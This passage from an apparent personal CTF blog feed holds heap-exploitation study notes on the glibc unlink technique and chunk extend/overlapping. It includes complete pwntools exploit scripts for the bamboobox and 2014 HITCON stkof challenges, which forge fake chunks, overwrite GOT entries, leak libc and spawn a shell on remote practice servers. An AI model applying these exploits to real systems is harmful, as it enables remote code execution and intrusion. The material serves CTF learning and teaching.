class="hljs-built_in">printf</span>(<span class="hljs-string">"Please enter the index of item:"</span>); <span class="hljs-built_in">read</span>(0, buf, 8u); v1 = atoi(buf); <span class="hljs-keyword">if</span> ( *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * v1) ) { free(*((void **)&unk_6020C8 + <span class="hljs-number">2</span> * v1)); *((_QWORD *)&unk_6020C8 + <span class="hljs-number">2</span> * v1) = <span class="hljs-number">0</span>; *((_DWORD *)&itemlist + <span class="hljs-number">4</span> * v1) = <span class="hljs-number">0</span>; puts("remove successful!!"); --num; } else { puts("invaild index"); } } else { puts("No item in the box"); } return __readfsqword(<span class="hljs-number">0</span>x28u) ^ v3;}</code></pre></div><p>This function is where free() is called.</p><p>The exploit then proceeds as follows:</p><ol><li>Lay out the heap</li><li>Forge a fake chunk</li><li>Set fd/bk = ptr-0x18/ptr-0x10</li><li>Modify the next chunk's prev_size/size</li><li>Use unlink to overwrite the global pointer</li><li>Write a GOT entry</li><li>Leak first, then get a shell</li></ol><blockquote><p>Some notes I use as a study aid:</p><p>The unlink process</p><ol><li>FD = 0x2000 (fake_chunk.fd)</li><li>BK = 0x2008 (fake_chunk.bk)</li><li>FD->bk = BK → *(0x2000 + 0x18 = 0x2018) = 0x2008</li><li>BK->fd = FD → *(0x2008 + 0x10 = 0x2018) = 0x2000</li><li>Final result: *(0x2018) = 0x2000 (itemlist[0] has been overwritten)</li></ol></blockquote><p><img src="/images/hitcontraining-unlink/1.png" alt></p><h2 id="exp">EXP</h2><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># -*- coding: utf-8 -*-</span><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher<span class="hljs-keyword">from</span> time <span class="hljs-keyword">import</span> sleep<span class="hljs-keyword">import</span> syscontext.arch = <span class="hljs-string">'amd64'</span>context.log_level = <span class="hljs-string">"debug"</span><span class="hljs-comment"># io = process("./bamboobox")</span>io = remote(<span 
class="hljs-string">'node5.buuoj.cn'</span>, <span class="hljs-number">29958</span>)elf = ELF(<span class="hljs-string">"./bamboobox"</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">DEBUG</span>(): raw_input(<span class="hljs-string">"DEBUG: "</span>) gdb.attach(io)<span class="hljs-keyword">def</span> <span class="hljs-title function_">show</span>(): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"1"</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">add</span>(<span class="hljs-params">length, name</span>): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"2"</span>) io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-built_in">str</span>(length).encode()) io.sendafter(<span class="hljs-string">b":"</span>, name)<span class="hljs-keyword">def</span> <span class="hljs-title function_">change</span>(<span class="hljs-params">idx, length, name</span>): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"3"</span>) io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-built_in">str</span>(idx).encode()) io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-built_in">str</span>(length).encode()) io.sendafter(<span class="hljs-string">b":"</span>, name)<span class="hljs-keyword">def</span> <span class="hljs-title function_">remove</span>(<span class="hljs-params">idx</span>): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"4"</span>) io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-built_in">str</span>(idx).encode())<span class="hljs-keyword">def</span> <span class="hljs-title function_">exit</span>(): io.sendlineafter(<span class="hljs-string">b":"</span>, <span class="hljs-string">b"5"</span>)<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">"__main__"</span>: 
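<span class="hljs-comment"># Sketch of the layout built below (my reading of the payload, assuming a 64-bit glibc without tcache): item 0 (0x40) holds the fake chunk, item 1 (0x80) is the victim whose free() triggers backward consolidation into the fake chunk, and item 2 (0x40) sits between item 1 and the top chunk.</span>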
add(<span class="hljs-number">0x40</span>, <span class="hljs-string">b'0'</span> * <span class="hljs-number">8</span>) add(<span class="hljs-number">0x80</span>, <span class="hljs-string">b'1'</span> * <span class="hljs-number">8</span>) add(<span class="hljs-number">0x40</span>, <span class="hljs-string">b'2'</span> * <span class="hljs-number">8</span>) ptr = <span class="hljs-number">0x6020c8</span> fakeChunk = flat([<span class="hljs-number">0</span>, <span class="hljs-number">0x41</span>, ptr - <span class="hljs-number">0x18</span>, ptr - <span class="hljs-number">0x10</span>, cyclic(<span class="hljs-number">0x20</span>), <span class="hljs-number">0x40</span>, <span class="hljs-number">0x90</span>]) change(<span class="hljs-number">0</span>, <span class="hljs-number">0x80</span>, fakeChunk) remove(<span class="hljs-number">1</span>) payload = flat([<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x40</span>, elf.got[<span class="hljs-string">'atoi'</span>]]) change(<span class="hljs-number">0</span>, <span class="hljs-number">0x80</span>, payload) show() <span class="hljs-comment"># 泄露atoi地址</span> atoi_addr = u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>)) success(<span class="hljs-string">"atoi_addr -> {:#x}"</span>.<span class="hljs-built_in">format</span>(atoi_addr)) <span class="hljs-comment"># 使用LibcSearcher查找libc版本</span> libc = LibcSearcher(<span class="hljs-string">'atoi'</span>, atoi_addr) libc_base = atoi_addr - libc.dump(<span class="hljs-string">'atoi'</span>) system_addr = libc_base + libc.dump(<span class="hljs-string">'system'</span>) success(<span class="hljs-string">"libc_base -> {:#x}"</span>.<span class="hljs-built_in">format</span>(libc_base)) success(<span class="hljs-string">"system_addr -> {:#x}"</span>.<span 
class="hljs-built_in">format</span>(system_addr)) pause() change(<span class="hljs-number">0</span>, <span class="hljs-number">0x8</span>, p64(system_addr)) io.sendline(<span class="hljs-string">b'$0'</span>) io.interactive() io.close()</code></pre></div>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Heap </tag>
<tag> unlink </tag>
<tag> hitcon </tag>
</tags>
</entry>
<entry>
<title>Unlink Study Notes</title>
<link href="/2026/02/11/heap-ptmalloc2-unlink/"/>
<url>/2026/02/11/heap-ptmalloc2-unlink/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="overview">Overview</h2><ol><li>unlink removes a free chunk from the doubly linked bin list it sits in (typically the unsorted bin) so that it can be merged with a <strong>physically adjacent</strong> chunk that is being freed (backward or forward consolidation); the merged chunk is then placed in the unsorted bin.</li><li>How it is abused: forge a fake_chunk that looks free, with crafted <code>fd</code> and <code>bk</code> pointers that pass the unlink check. unlink then overwrites the slot that stores the pointer p with that slot's own address minus 0x18, which can be escalated into an <strong>arbitrary address write</strong>.</li><li>Root causes: <code>Offbynull</code>, <code>offbyone</code>, or a heap overflow, that is, any bug that lets the attacker modify a chunk's in-use flag bit.</li></ol><h3 id="源码解读">Reading the source</h3><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/* malloc.c, inside _int_free */</span><span class="hljs-comment">/* p points to the malloc_chunk being freed */</span><span class="hljs-keyword">if</span> (!prev_inuse(p)) { prevsize = p->prev_size; size += prevsize;<span class="hljs-comment">/* move p back so that it points to the previous chunk */</span> p = chunk_at_offset(p, -((<span class="hljs-type">long</span>) prevsize)); unlink(p, bck, fwd);}</code></pre></div><ol><li><p>The check: look at the <code>PREV_INUSE</code> flag bit (the <code>P</code> bit) in the size field of the chunk being freed. If it is 0, the physically previous chunk is free and is consolidated via unlink; otherwise this branch is skipped;</p></li><li><p>Read prev_size and add it to the current size. The pointer is then moved back to the previous chunk: merged chunk address = address of the chunk being freed - size of the previous chunk, so the pointer <code>p</code> jumps from the current chunk to the previous one;</p></li></ol><div class="code-wrapper"><pre><code class="hljs c">prevsize = p->prev_size; size += prevsize;</code></pre></div><ol start="3"><li>Finally, unlink is called on the previous chunk (which <code>p</code> now points to) to take it off its bin list so that the two chunks can be merged.</li></ol><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/* Helper macros: */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s))) </span><span class="hljs-comment">/* unlink removes the chunk pointed to by P from its doubly linked list; BK and FD are temporaries */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> unlink(P, BK, FD) { \</span><span class="hljs-meta"> FD = P->fd; \</span><span class="hljs-meta"> BK = P->bk; \</span><span class="hljs-meta"> 
<span class="hljs-keyword">if</span> (__builtin_expect (FD->bk != P || BK->fd != P, 0)) </span> malloc_printerr (check_action, <span class="hljs-string">"corrupted double-linked list"</span>, P, AV); FD->bk = BK; \ BK->fd = FD; \ ...}</code></pre></div><p>How the unlink macro works:</p><ol><li><p>Read the <code>fd</code> and <code>bk</code> pointers of the chunk that P points to (after the pointer was moved back) into the temporaries FD and BK;</p></li><li><p>Then comes a check: FD's bk and BK's fd must both point back at the current chunk P. If either does not, malloc_printerr reports "corrupted double-linked list" and the unlink is not performed;</p></li></ol><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-keyword">if</span> (__builtin_expect (FD->bk != P || BK->fd != P, <span class="hljs-number">0</span>)) malloc_printerr (check_action, <span class="hljs-string">"corrupted double-linked list"</span>, P, AV);</code></pre></div><ol start="3"><li>If the check passes, BK is stored into FD's bk and FD is stored into BK's fd.</li></ol><h2 id="unlink的绕过和利用">Bypassing and exploiting unlink</h2><p>We forge the following values:</p><ol><li>chunk = 0x0602280 (P is the address of the chunk that will be merged into; P is stored at chunk, i.e. <code>*chunk = P</code>)</li><li>P_fd = chunk - 0x18 = 0x0602268</li><li>P_bk = chunk - 0x10 = 0x0602270</li></ol><blockquote><p>I got stuck here while learning, so let us review why the values subtracted are <code>0x18</code> and <code>0x10</code>. In glibc's malloc implementation (ptmalloc), a 64-bit chunk is laid out as shown below; the <code>fd</code> and <code>bk</code> fields are <strong>only meaningful while the chunk is free and sits in a bin</strong>:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span> {</span> <span class="hljs-type">size_t</span> prev_size; <span class="hljs-comment">/* offset 0x00 (only meaningful when the previous chunk is free) */</span> <span class="hljs-type">size_t</span> size; <span class="hljs-comment">/* offset 0x08 (includes the flag bits) */</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">fd</span>;</span> <span class="hljs-comment">/* offset 0x10 (only used while in a bin) */</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">malloc_chunk</span>* <span class="hljs-title">bk</span>;</span> <span class="hljs-comment">/* offset 0x18 */</span> <span 
class="hljs-comment">// ... 更后面还有 fd_nextsize, bk_nextsize(large bin)</span>};</code></pre></div><p>而回顾上面的内容有这样的一条:“通过后会把BK赋值给FD的bk,把FD赋值给BK的fd。”</p></blockquote><h3 id="绕过技巧">绕过技巧</h3><div class="code-wrapper"><pre><code class="hljs c">define <span class="hljs-title function_">unlink</span><span class="hljs-params">(P, BK, FD)</span> { \ FD = P->fd; \FD = <span class="hljs-number">0x602268</span> BK = P->bk; \BK = <span class="hljs-number">0x602270</span> <span class="hljs-keyword">if</span> (__builtin_expect (FD->bk != P || BK->fd != P, <span class="hljs-number">0</span>)) \FD->bk = *(<span class="hljs-number">0x602268</span>+<span class="hljs-number">0x18</span>) | *(<span class="hljs-number">0x602280</span>) = P \ BK->fd = *(<span class="hljs-number">0x602270</span>+<span class="hljs-number">0x10</span>) = *(<span class="hljs-number">0x602280</span>) = P ,绕过! malloc_printerr (check_action, <span class="hljs-string">"corrupted double-linked list"</span>, P, AV); FD->bk = BK; \*(<span class="hljs-number">0x602268</span>+<span class="hljs-number">0x18</span>) | *(<span class="hljs-number">0x602280</span>) = <span class="hljs-number">0x602270</span> BK->fd = FD; \ *(<span class="hljs-number">0x602270</span>+<span class="hljs-number">0x10</span>) | *(<span class="hljs-number">0x602280</span>) = <span class="hljs-number">0x602268</span> ...}</code></pre></div><ol><li>绕过检查可以总结成:<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi><mi>D</mi><mo>−</mo><mo>></mo><mi>b</mi><mi>k</mi><mo>=</mo><mo>=</mo><mi>P</mi></mrow><annotation encoding="application/x-tex">FD->bk == P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.76666em;vertical-align:-0.08333em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">F</span><span class="mord mathdefault" style="margin-right:0.02778em;">D</span><span 
class="mord">−</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.69444em;vertical-align:0em;"></span><span class="mord mathdefault">b</span><span class="mord mathdefault" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span></span><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">P</span></span></span></span> 和 <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>B</mi><mi>K</mi><mo>−</mo><mo>></mo><mi>f</mi><mi>d</mi><mo>=</mo><mo>=</mo><mi>P</mi></mrow><annotation encoding="application/x-tex">BK->fd == P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.76666em;vertical-align:-0.08333em;"></span><span class="mord mathdefault" style="margin-right:0.05017em;">B</span><span class="mord mathdefault" style="margin-right:0.07153em;">K</span><span class="mord">−</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.8888799999999999em;vertical-align:-0.19444em;"></span><span class="mord mathdefault" style="margin-right:0.10764em;">f</span><span class="mord mathdefault">d</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span 
class="mrel">=</span></span><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">P</span></span></span></span>,等价于: <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo>∗</mo><mo stretchy="false">(</mo><msub><mi>P</mi><mi>f</mi></msub><mi>d</mi><mo>+</mo><mn>0</mn><mi>x</mi><mn>18</mn><mo stretchy="false">)</mo><mo>=</mo><mo>=</mo><mi>P</mi></mrow><annotation encoding="application/x-tex">*(P_fd + 0x18) == P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.036108em;vertical-align:-0.286108em;"></span><span class="mord">∗</span><span class="mopen">(</span><span class="mord"><span class="mord mathdefault" style="margin-right:0.13889em;">P</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3361079999999999em;"><span style="top:-2.5500000000000003em;margin-left:-0.13889em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathdefault mtight" style="margin-right:0.10764em;">f</span></span></span></span><span class="vlist-s"></span></span><span class="vlist-r"><span class="vlist" style="height:0.286108em;"><span></span></span></span></span></span></span><span class="mord mathdefault">d</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">0</span><span 
class="mord mathdefault">x</span><span class="mord">1</span><span class="mord">8</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span></span><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">P</span></span></span></span> 和 <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo>∗</mo><mo stretchy="false">(</mo><msub><mi>P</mi><mi>b</mi></msub><mi>k</mi><mo>+</mo><mn>0</mn><mi>x</mi><mn>10</mn><mo stretchy="false">)</mo><mo>=</mo><mo>=</mo><mi>P</mi></mrow><annotation encoding="application/x-tex">*(P_bk + 0x10) == P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">∗</span><span class="mopen">(</span><span class="mord"><span class="mord mathdefault" style="margin-right:0.13889em;">P</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.33610799999999996em;"><span style="top:-2.5500000000000003em;margin-left:-0.13889em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathdefault mtight">b</span></span></span></span><span class="vlist-s"></span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord mathdefault" style="margin-right:0.03148em;">k</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">+</span><span class="mspace" 
style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord">0</span><span class="mord mathdefault">x</span><span class="mord">1</span><span class="mord">0</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span></span><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.68333em;vertical-align:0em;"></span><span class="mord mathdefault" style="margin-right:0.13889em;">P</span></span></span></span></li><li>可以构造成</li></ol><div class="code-wrapper"><pre><code class="hljs text">P_fd = P - 0x18P_bk = P - 0x10</code></pre></div><p>即:</p><div class="code-wrapper"><pre><code class="hljs text">FD = P - 0x18FD->bk = (P - 0x18) + 0x18 = P → 内容等于 P(绕过)BK = P - 0x10BK->fd = (P - 0x10) + 0x10 = P → 内容等于 P(绕过)</code></pre></div><p>总结起来就是:<strong>让 <code>P->fd</code> 指向 <code>P - 0x18</code>,<code>P->bk</code> 指向 <code>P - 0x10</code>,就能绕过 <code>FD->bk == P</code> 和 <code>BK->fd == P</code> 检查,并使 <code>\*P</code> 被覆写为 <code>P - 0x18</code>。</strong></p><h2 id="2014-hitcon-stkof">2014 HITCON stkof</h2><ol><li>堆布局</li><li>伪造 fake chunk</li><li>fd/bk = ptr-0x18/ptr-0x10</li><li>修改 next chunk 的 prev_size/size</li><li>unlink 写全局指针</li><li>写 GOT 表项</li><li>先 leak 后 getshell</li></ol><p><strong>EXP:</strong></p><div class="code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *context.log_level = <span class="hljs-string">'debug'</span><span class="hljs-comment">#libc = ELF('./libc.so.6')</span><span class="hljs-comment">#sh = 
process("./stkof")</span>sh = remote(<span class="hljs-string">"node5.buuoj.cn"</span>,<span class="hljs-number">25830</span>)stkof = ELF(<span class="hljs-string">'./stkof'</span>)head = <span class="hljs-number">0x602140</span><span class="hljs-keyword">def</span> <span class="hljs-title function_">malloc</span>(<span class="hljs-params">size</span>): sh.sendline(<span class="hljs-string">b'1'</span>) sh.sendline(<span class="hljs-built_in">str</span>(size)) sh.recvuntil(<span class="hljs-string">b'OK\n'</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">edit</span>(<span class="hljs-params">idx,size,content</span>): sh.sendline(<span class="hljs-string">b'2'</span>) sh.sendline(<span class="hljs-built_in">str</span>(idx)) sh.sendline(<span class="hljs-built_in">str</span>(size)) sh.send(content) sh.recvuntil(<span class="hljs-string">'OK\n'</span>)<span class="hljs-keyword">def</span> <span class="hljs-title function_">free</span>(<span class="hljs-params">idx</span>): sh.sendline(<span class="hljs-string">b'3'</span>) sh.sendline(<span class="hljs-built_in">str</span>(idx))malloc(<span class="hljs-number">0x100</span>) malloc(<span class="hljs-number">0x30</span>) malloc(<span class="hljs-number">0x80</span>) payload = p64(<span class="hljs-number">0</span>) <span class="hljs-comment">#pre_size = 0</span>payload += p64(<span class="hljs-number">0x20</span>) <span class="hljs-comment">#fake size</span>payload += p64(head + <span class="hljs-number">0x10</span> - <span class="hljs-number">0x18</span>) payload += p64(head + <span class="hljs-number">0x10</span> - <span class="hljs-number">0x10</span>) payload += p64(<span class="hljs-number">0x20</span>) payload = payload.ljust(<span class="hljs-number">0x30</span>,<span class="hljs-string">b'a'</span>)payload += p64(<span class="hljs-number">0x30</span>) payload += p64(<span class="hljs-number">0x90</span>) edit(<span class="hljs-number">2</span>, <span 
class="hljs-built_in">len</span>(payload), payload) free(<span class="hljs-number">3</span>) sh.recvuntil(<span class="hljs-string">'OK\n'</span>)payload2 = <span class="hljs-string">b'a'</span> * <span class="hljs-number">8</span> + p64(stkof.got[<span class="hljs-string">'free'</span>]) + p64(stkof.got[<span class="hljs-string">'puts'</span>]) + p64(stkof.got[<span class="hljs-string">'atoi'</span>])edit(<span class="hljs-number">2</span>,<span class="hljs-built_in">len</span>(payload2),payload2) payload3 = p64(stkof.plt[<span class="hljs-string">'puts'</span>])edit(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(payload3),payload3) free(<span class="hljs-number">1</span>) puts_addr = u64(sh.recvuntil(<span class="hljs-string">'\nOK\n'</span>, drop=<span class="hljs-literal">True</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>)) <span class="hljs-comment">#</span><span class="hljs-comment"># libc_base = puts_addr - libc.symbols['puts']</span><span class="hljs-comment"># binsh_addr = libc_base + next(libc.search(b'/bin/sh'))</span><span class="hljs-comment"># system_addr = libc_base + libc.symbols['system']</span><span class="hljs-comment">#</span>libc = LibcSearcher(<span class="hljs-string">'puts'</span>,puts_addr)libc_base = puts_addr - libc.dump(<span class="hljs-string">'puts'</span>)system_addr = libc_base + libc.dump(<span class="hljs-string">'system'</span>)payload4 = p64(system_addr)binsh_addr =libc_base + libc.dump(<span class="hljs-string">'str_bin_sh'</span>)edit(<span class="hljs-number">2</span>, <span class="hljs-built_in">len</span>(payload4), payload4)sh.send(p64(binsh_addr))sh.interactive()</code></pre></div><h2 id="references">References</h2><ul><li><p>CTF-Wiki</p><ul><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/unlink/#2014-hitcon-stkof">Unlink</a></li></ul></li><li><p>CSDN</p><ul><li><a 
href="https://hollk.blog.csdn.net/article/details/108481889?spm=1001.2014.3001.5502">好好说话之unlink</a></li><li><a href="https://blog.csdn.net/fzucaicai/article/details/129705468">堆溢出——unlink漏洞攻击(bamboobox)</a></li></ul></li><li><p>博客园</p><ul><li><a href="https://www.cnblogs.com/lordtianqiyi/articles/16345374.html">堆漏洞之unlink & 2014 HITCON stkof</a></li><li><a href="https://www.cnblogs.com/nemuzuki/p/17286811.html">堆块chunk介绍&堆溢出漏洞的unlink利用原理</a></li></ul></li><li><p>Blogs</p><ul><li><a href="https://iyheart.github.io/2024/10/11/CTFblog/PWN%E7%B3%BB%E5%88%97blog/Linux_pwn/2.%E5%A0%86%E7%B3%BB%E5%88%97/PWN%E5%A0%86unlink/">PWN堆unlink</a></li><li><a href="https://jimi-lab.github.io/2025/08/18/%E5%A0%86%E6%BA%A2%E5%87%BA%E5%88%A9%E7%94%A8%E6%89%8B%E6%B3%95/">堆溢出利用</a></li><li><a href="https://www.nan0in27.cn/p/%E5%A0%86%E6%BA%A2%E5%87%BAunlink%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBbuu%E4%B8%BE%E4%BE%8B/">堆溢出——unlink漏洞攻击(buu举例)</a></li><li><a href="https://zicai.github.io/wooyun_articles/drops/%E5%A0%86%E6%BA%A2%E5%87%BA%E7%9A%84unlink%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95.html">堆溢出的unlink利用方法</a></li></ul></li><li><p>先知</p><ul><li><a href="https://xz.aliyun.com/news/5361">堆入门—unlink的理解和各种题型总结</a></li></ul></li><li><p>看雪</p><ul><li><a href="https://bbs.kanxue.com/thread-289464.htm">堆学习:Unlink attack</a></li></ul></li><li><p>Bilibili</p><ul><li><a href="https://www.bilibili.com/video/BV11q4y1E7E2?vd_source=03d433e8ec785208bc57517d4c340d73">【星盟安全】PWN系列教程 第20节 Unlink</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Pwn </tag>
<tag> 堆 </tag>
<tag> unlink </tag>
</tags>
</entry>
<entry>
<title>Chunk Extend and Overlapping</title>
<link href="/2026/02/09/chunk-extend-overlapping/"/>
<url>/2026/02/09/chunk-extend-overlapping/</url>
<content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="overview">Overview</h2><blockquote><p>Chunk extend is a common heap exploitation technique; extending a chunk produces chunk overlapping. It requires the following conditions:</p></blockquote><ul><li>The program has a heap-based vulnerability</li><li>The vulnerability lets the attacker control data in a chunk header</li></ul><h2 id="ptmalloc对堆进行操作时使用的宏">Macros ptmalloc uses to operate on the heap</h2><p>Chunk extend works because of the macros ptmalloc uses when it operates on heap chunks.</p><p>In ptmalloc, the size of a chunk is obtained as follows:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/* Get size, ignoring use bits */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> chunksize(p) (chunksize_nomask(p) & ~(SIZE_BITS))</span><span class="hljs-comment">/* Like chunksize, but do not mask SIZE_BITS. */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> chunksize_nomask(p) ((p)->mchunk_size)</span></code></pre></div><p>That is, the size is read from the chunk's own mchunk_size field with the flag bits masked off. The address of the next chunk is then the current chunk pointer plus this size.</p><p>In ptmalloc, information about the previous chunk is obtained as follows:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/* Size of the chunk below P. Only valid if !prev_inuse (P). */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> prev_size(p) ((p)->mchunk_prev_size)</span><span class="hljs-comment">/* Ptr to previous physical malloc_chunk. Only valid if !prev_inuse (P). */</span><span class="hljs-meta">#<span class="hljs-keyword">define</span> prev_chunk(p) ((mchunkptr)(((char *) (p)) - prev_size(p)))</span></code></pre></div><p>That is, the size of the previous chunk is read from malloc_chunk->prev_size and subtracted from the address of the current chunk.</p><p>In ptmalloc, whether the current chunk is in use is determined as follows:</p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">define</span> inuse(p)</span> ((((mchunkptr)(((<span class="hljs-type">char</span> *) (p)) + chunksize(p)))->mchunk_size) & PREV_INUSE)</code></pre></div><p>That is, it checks the prev_inuse bit of the next chunk, and the address of the next chunk is in turn computed from the current chunk's size, as described above.</p><blockquote><p>For why this is the case and for more operations, see <a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/heap-structure/">CTF Wiki - 堆相关数据结构</a>.</p></blockquote><p>These macros show that ptmalloc relies on <strong>the data in the chunk header to decide whether a chunk is in use and to locate the chunks before and after it</strong>. In short, chunk extend controls the size and prev_size fields so that operations span chunk boundaries, which leads to overlapping.</p><h2 id="example">Example</h2><h3 id="基本示例-1:对-inuse-的-fastbin-进行-extend">Basic example 1: extending an inuse fastbin chunk</h3><ul><li>The effect is to control the contents of the second chunk by changing the size of the first.</li><li><strong>All examples are 64-bit programs. To test on 32-bit, change the 8-byte offsets to 4 bytes</strong>.</li></ul><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span>{ <span class="hljs-type">void</span> *ptr,*ptr1; ptr=<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第一个0x10的chunk</span> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<span class="hljs-comment">//分配第二个0x10的chunk</span> *(<span class="hljs-type">long</span> <span class="hljs-type">long</span> *)((<span class="hljs-type">long</span> <span class="hljs-type">long</span>)ptr<span class="hljs-number">-0x8</span>)=<span class="hljs-number">0x41</span>;<span class="hljs-comment">// 修改第一个块的size域</span> <span class="hljs-built_in">free</span>(ptr); 
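<span class="hljs-comment">/* Note (a reading of the macros above, not part of the original listing): free() takes the chunk size from the forged header, so chunk1 is recorded as a free 0x40-byte chunk that also covers chunk2. Assumption: on a glibc with tcache (the 0x4042a0 heap address in the pwndbg session suggests one) it lands in the 0x40 tcache bin rather than a fastbin; either way the malloc(0x30) request that follows is served from it. */</span>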
